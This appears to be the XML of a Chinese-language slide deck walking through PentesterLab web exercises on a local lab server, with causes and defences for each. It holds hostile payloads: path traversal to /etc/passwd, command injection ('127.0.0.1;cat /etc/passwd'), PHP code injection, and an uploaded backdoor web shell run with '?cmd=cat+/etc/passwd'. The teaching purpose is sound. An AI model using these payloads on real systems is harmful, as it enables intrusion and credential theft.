            <a:ext cx="7445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http://honglung.pixnet.net/blog/post/85892242-pentesterlab---sql-injections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3558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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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實戰測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6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﻿Directory traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="9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229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是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安全威脅，它是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概念基於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的實現。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上傳到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伺服器，以允許遠端訪問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伺服器，例如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伺服器的檔案系統。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通常被認為是遠端訪問木馬。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攻擊者可以使用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發出指令，在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伺服器上執行權限升級以及在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伺服器上上傳、刪除、下載和執行檔案的功能。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00FA20-772F-4D15-B966-58BDEE8D5E52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="6398696"/>
            <a:ext cx="3998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https://en.wikipedia.org/wiki/Web_shell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90809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EECBEC21-E0FE-415A-815F-43FB7C57F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" y="1540026"/>
            <a:ext cx="5210175" cy="33623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﻿Directory traversal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 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76055" y="1631694"/>
            <a:ext cx="3919917" cy="45259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右鍵點選圖片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，就會看到網址顯示圖片位址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http://192.168.43.212/dirtrav/example1.php?file=hacker.png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CDFD00-11BA-41BA-85FE-41F7AC385180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429228" y="2454952"/>
            <a:ext cx="1512168" cy="4320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42E0F68-DC21-4E19-88B2-D6CDF1545B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="103555" y="6371713"/>
            <a:ext cx="4878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https://www.cnblogs.com/kaiho/p/8276865.html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D1FFA3C-B373-46C0-934D-41796BFCB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14" y="4797152"/>
            <a:ext cx="5374941" cy="157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11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Directory traversal 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 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經由修改網址參數，可取得所有帳號密碼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http://192.168.43.212/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dirtrav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/example1.php?file=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2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../../../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2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/passwd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151E74-02F0-4158-AB21-171A5C0A3BD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="103555" y="6371713"/>
            <a:ext cx="4878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https://www.cnblogs.com/kaiho/p/8276865.html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9CA3B2E-5E1D-49F9-9550-EB5753D58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34" y="3717032"/>
            <a:ext cx="8724932" cy="21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918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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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程式分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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﻿Directory traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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73550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Directory traversal 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 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造成跨目錄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檔案穿越攻擊注入的原因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伺服器安全性錯誤，開放過多權限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防範方式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設定伺服器，指定只能瀏覽特定格式檔案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如：網站本身的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檔、圖片檔等必要檔案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設定伺服器的使用者帳號不可訪問網站目錄以外的資料夾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3F078F-D43E-455B-8B17-CEEE2598F748}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="103555" y="6371713"/>
            <a:ext cx="4878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https://www.cnblogs.com/kaiho/p/8276865.html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2535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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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實戰測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6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﻿﻿File Include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="9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57480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D75ECD2-4EAE-47BF-A406-5B580DF3AEE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93242" y="6371713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https://blog.csdn.net/weixin_30723433/article/details/99806436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A3DB82-C6E6-471E-9904-BF9651506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4" y="1631694"/>
            <a:ext cx="3219450" cy="16192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File Include Example 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1765" y="1631694"/>
            <a:ext cx="5644208" cy="45259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進入後可看到網址為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http://192.168.43.212/fileincl/example1.php?page=intro.php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CDFD00-11BA-41BA-85FE-41F7AC385180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429228" y="2454952"/>
            <a:ext cx="1512168" cy="4320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2115848-9E7C-4CB5-9345-20A578FC6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699" y="3250944"/>
            <a:ext cx="6900781" cy="316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33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File Include Example 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經由修改網址參數，可取得所有帳號密碼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http://192.168.43.212/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fileincl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/example1.php?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2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../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2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/passwd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381A2B-5306-4D75-880E-AF9B4A54E795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93242" y="6371713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https://blog.csdn.net/weixin_30723433/article/details/99806436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34AFE45-8170-4A9C-B548-33B331B27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95" y="2996952"/>
            <a:ext cx="8169810" cy="331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125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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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程式分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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﻿ File Include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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02844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File Include Example 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造成檔案包含漏洞的原因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沒有檢查使用者輸入的參數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直接使用使用者輸入參數做為引用路徑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防範方式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不要直接使用使用者出入的參數做為檔案引用路徑，使用簡單的邏輯判斷，保證只會引用特定檔案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3F078F-D43E-455B-8B17-CEEE2598F748}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="103555" y="6371713"/>
            <a:ext cx="4878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https://www.cnblogs.com/kaiho/p/8276865.html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85420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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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實戰測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6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﻿﻿Code injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="9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089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2020-04-24 News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B35507FB-59EE-486A-B230-044CA5351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627" y="1600200"/>
            <a:ext cx="7466745" cy="452596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C00FA20-772F-4D15-B966-58BDEE8D5E52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="6398696"/>
            <a:ext cx="4245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https://www.ithome.com.tw/news/137211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29455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CFD3B8A3-C805-4510-A6F5-958109900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4" y="1631694"/>
            <a:ext cx="4057650" cy="22764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Code injection Example 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95935" y="1631694"/>
            <a:ext cx="5000037" cy="45259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進入後可看到網址為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http://192.168.43.212/codeexec/example1.php?name=hacker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CDFD00-11BA-41BA-85FE-41F7AC385180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="2406488"/>
            <a:ext cx="1512168" cy="4320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4D666C3-21A7-42F1-BF11-2ECD7921F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676" y="3140968"/>
            <a:ext cx="7212920" cy="330958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E7945D7-4D43-4D61-A93F-9FFD54786BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93242" y="6371713"/>
            <a:ext cx="48314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4"/>
              </a:rPr>
              <a:t>https://www.cnblogs.com/kaiho/p/8303323.html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76221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Code injection Example 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經由修改網址參數，可注入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http://192.168.43.212/codeexec/example1.php?name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2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"phpinfo();"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1280CA-197B-4197-9FCC-12A0A4690A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93242" y="6371713"/>
            <a:ext cx="48314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https://www.cnblogs.com/kaiho/p/8303323.html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A6FD82-E0B5-41AC-843B-D64A59C08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06" y="2996084"/>
            <a:ext cx="8727067" cy="330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042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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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程式分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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﻿ Code injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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76119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Code injection Example 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造成程式注入漏洞的原因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eval()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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>create_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()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函數直接執行使用者傳遞的參數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防範方式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謹慎使用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eval()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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>create_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()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等函數，將其設定在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php.ini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內為禁止使用函數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02ABB7-8084-448B-A3E0-9667445A45AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93242" y="6371713"/>
            <a:ext cx="48314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https://www.cnblogs.com/kaiho/p/8303323.html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40426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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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實戰測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6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﻿﻿Commands injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="9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05058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3373DA1-1F92-434C-84A2-93CAB878F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2" y="1631694"/>
            <a:ext cx="3381375" cy="27908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Commands injection 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 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95935" y="1631694"/>
            <a:ext cx="5000037" cy="45259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進入後可看到網址為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http://192.168.43.212/commandexec/example1.php?ip=127.0.0.1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CDFD00-11BA-41BA-85FE-41F7AC385180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3150808"/>
            <a:ext cx="1512168" cy="4320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3F0854-280F-4538-81A9-FFF57D61B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693" y="3341142"/>
            <a:ext cx="4680520" cy="266611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4997F1B-5E7E-49B7-A939-E9956A9AA1A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148028" y="6048547"/>
            <a:ext cx="5526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http://honglung.pixnet.net/blog/post/85890571-pentesterlab---commands-injection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02983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Commands injection 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 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5259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經由修改網址參數，可注入系統指令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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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192.168.43.212/commandexec/example1.php?ip=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2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127.0.0.1;cat%20/etc/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="24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54F1D2E-4557-4734-9B2C-E3DF61695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792886"/>
            <a:ext cx="4965754" cy="425566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46E8690-DA86-443C-ADD4-6F1E2F5904E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148028" y="6048547"/>
            <a:ext cx="5526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http://honglung.pixnet.net/blog/post/85890571-pentesterlab---commands-injection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36118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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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程式分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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﻿Commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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32155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Commands injection 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 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造成命令注入漏洞的原因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exec()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system()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等函數直接執行使用者傳遞的參數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防範方式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謹慎使用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exec()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system()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等函數，將其設定在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php.ini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內為禁止使用函數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015EF3-9D05-4F8F-A6AE-124DCEE42958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148028" y="6048547"/>
            <a:ext cx="5526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http://honglung.pixnet.net/blog/post/85890571-pentesterlab---commands-injection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16405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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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實戰測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6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﻿﻿LDAP attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="9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115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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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測試環境</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23320714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53AD2FC8-585E-4F8B-82CB-2E7C5A8BB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4" y="1631694"/>
            <a:ext cx="3962400" cy="16859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LDAP attacks Example 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95935" y="1631694"/>
            <a:ext cx="5000037" cy="45259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進入後可看到網址為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http://192.168.43.212/ldap/example1.php?username=hacker&amp;password=hacker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CDFD00-11BA-41BA-85FE-41F7AC385180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="440387" y="2514725"/>
            <a:ext cx="1512168" cy="4320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949B0DC-3E0B-4358-A296-B3DC6C4E4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546" y="3366832"/>
            <a:ext cx="7102426" cy="268171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649764C-9E3E-422F-8E3C-8468019C78B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="65704" y="6398696"/>
            <a:ext cx="7537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4"/>
              </a:rPr>
              <a:t>http://honglung.pixnet.net/blog/post/85989361-pentesterlab---ldap-attacks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94477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LDAP attacks Example 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將網址後的參數刪除，還是可以正常訪問網頁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http://192.168.43.212/ldap/example1.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="24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E42B65-E91A-46AC-A07D-A4100FD59AE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="65704" y="6398696"/>
            <a:ext cx="7537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http://honglung.pixnet.net/blog/post/85989361-pentesterlab---ldap-attacks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21D9175-EFCD-4EC0-8CF0-C53681D8B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340" y="3140968"/>
            <a:ext cx="5893320" cy="325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459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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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程式分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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﻿ LDAP attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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44018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LDAP attacks Example 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0912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造成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LDAP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攻擊漏洞的原因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LDAPv3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設計允許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 base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是為了能方便存取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RootDSE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，取得像是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naming context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或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authentication type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等資訊。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此弱點可能為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false-positive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敘述看起來所謂的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false-positive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就是當此弱點是發現於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，若是發現在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就要考慮去停用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 base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防範方式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禁止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 base query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直接關閉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Anonymous Bind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及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Anonymous Access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就可以解決公開暴露資訊的情況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FB1A3D-17E9-4AFC-9B43-78B71A6C2367}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="65704" y="6398696"/>
            <a:ext cx="7537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http://honglung.pixnet.net/blog/post/85989361-pentesterlab---ldap-attacks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37503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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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實戰測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6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﻿﻿File Upload Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="9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25522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79CC556-22CB-49C8-981A-4FF0E05E5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4" y="1631694"/>
            <a:ext cx="3352800" cy="17145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File Upload Example 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95935" y="1631694"/>
            <a:ext cx="5000037" cy="45259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進入後可看到檔案上傳畫面的網頁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CDFD00-11BA-41BA-85FE-41F7AC385180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="440387" y="2514725"/>
            <a:ext cx="1512168" cy="4320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8C2AF8-58C4-42F7-8CD3-0B6A91C39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2715954"/>
            <a:ext cx="5650708" cy="368248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9AFA560-D8C2-46E2-8B38-A0718B9C32ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72159" y="6381864"/>
            <a:ext cx="5650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4"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/ahu0076/article/details/102029021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925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38CEAB0-6382-4523-9CED-AFB3C01AA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57" y="2684937"/>
            <a:ext cx="4752528" cy="277938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File Upload Example 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3" y="1631694"/>
            <a:ext cx="8816460" cy="45259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選擇檔案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usr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/share/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webshells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/php/simple-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backdoor.php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163B1B0-095A-43E5-BE98-7C9792010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191" y="2684937"/>
            <a:ext cx="3631885" cy="2484420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="箭號: 向下 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C6B70E8-37DB-4466-813E-430424BABEB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8373022">
            <a:off x="3054373" y="4485008"/>
            <a:ext cx="307456" cy="76238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A768BF1B-0F85-4809-B8FF-5466D80E27B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="17306188">
            <a:off x="4749218" y="4361586"/>
            <a:ext cx="307456" cy="76238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48F8E742-F813-4870-8D70-51F1E5911902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8373022">
            <a:off x="1501342" y="4907367"/>
            <a:ext cx="307456" cy="76238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C06017-F664-490D-B8B9-6E5331714897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72159" y="6381864"/>
            <a:ext cx="5650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4"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/ahu0076/article/details/102029021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97472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C4A6758-7A77-4C7E-B844-D146935F5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813" y="2209288"/>
            <a:ext cx="5819775" cy="41624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File Upload Example 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3" y="1631694"/>
            <a:ext cx="8816460" cy="45259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上傳後點選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here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A768BF1B-0F85-4809-B8FF-5466D80E27B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="17306188">
            <a:off x="5692612" y="3779873"/>
            <a:ext cx="307456" cy="76238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C06017-F664-490D-B8B9-6E5331714897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72159" y="6381864"/>
            <a:ext cx="5650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https://blog.csdn.net/ahu0076/article/details/102029021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19532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File Upload Example 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3" y="1631694"/>
            <a:ext cx="8816460" cy="45259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依照顯示的網址將後方的參數複製到瀏覽器的網址列後方，然後跳轉過去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http://192.168.43.212/upload/images/simple-backdoor.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2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?cmd=cat+/etc/passwd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C06017-F664-490D-B8B9-6E5331714897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72159" y="6381864"/>
            <a:ext cx="5650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https://blog.csdn.net/ahu0076/article/details/102029021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4BAA8A0-48CA-4929-849C-5E35B9F78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6" y="3573016"/>
            <a:ext cx="9144000" cy="1302660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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A768BF1B-0F85-4809-B8FF-5466D80E27B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7038564">
            <a:off x="5716679" y="3843153"/>
            <a:ext cx="307456" cy="76238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1351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File Upload Example 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C06017-F664-490D-B8B9-6E5331714897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72159" y="6381864"/>
            <a:ext cx="5650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https://blog.csdn.net/ahu0076/article/details/102029021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BF8537A-0BB3-45E5-9DCB-69B249CAA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606" y="2195249"/>
            <a:ext cx="5710787" cy="4176464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1FC151D1-46EF-4647-9364-D84CAA97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631694"/>
            <a:ext cx="8816460" cy="45259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就會顯示出該伺服器的所有帳號密碼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="24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077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漏洞平台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7715200" cy="604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1.PentesterLab|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for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Pentester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73" y="2239464"/>
            <a:ext cx="6468254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8D071FB-3744-485D-820C-194C2526CDBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3463600"/>
            <a:ext cx="8229600" cy="2662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 for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1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Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0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是國外安全研究者開發的的一款滲透測試平台，通過該平台你可以了解到常見的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0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dirty="0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漏洞檢測技術。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:srgbClr val="55555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包括 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0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跨站腳本攻擊、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0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注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0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目錄遍歷、命令注入、代碼注入、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0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r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0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攻擊、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0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LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0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攻擊、文件上傳以及一些指紋識別技術。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1874B6-2BE3-4060-9F26-A2B062D2805A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="6398696"/>
            <a:ext cx="5670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http://blog.peterhome.idv.tw/index.php/2020/01/02/116/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5809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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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程式分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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﻿ File Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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37738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File Upload Example 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0912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造成上傳木馬漏洞的原因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沒有檢查使用者上傳的檔案類型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允許使用者跳轉到上傳的檔案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防範方式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檢查使用者上傳的檔案類型通過附檔名、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ContentType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(MIME)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等判斷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對於圖片、影片、聲音檔，壓縮檔案後再顯示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對於文字檔讀取後轉譯再供查看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Office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檔，轉換成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後再供下載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73CEAD-3E96-4659-847E-A91846E7F3D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72159" y="6381864"/>
            <a:ext cx="5650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https://blog.csdn.net/ahu0076/article/details/102029021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15949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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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實戰測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6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﻿﻿XML attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="9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96764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7EE962C-294E-4D47-87A7-4009705AD7B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="65704" y="6384512"/>
            <a:ext cx="7379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http://honglung.pixnet.net/blog/post/86029843-pentesterlab---xml-attacks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B481F7D-7733-4FC7-9536-B4E1FFB4A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28" y="1658677"/>
            <a:ext cx="3524250" cy="16383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 attacks Example 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95935" y="1631694"/>
            <a:ext cx="5000037" cy="45259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進入後可看到網址為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http://192.168.43.212/xml/example1.php?xml=%3Ctest%3Ehacker%3C/test%3E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CDFD00-11BA-41BA-85FE-41F7AC385180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
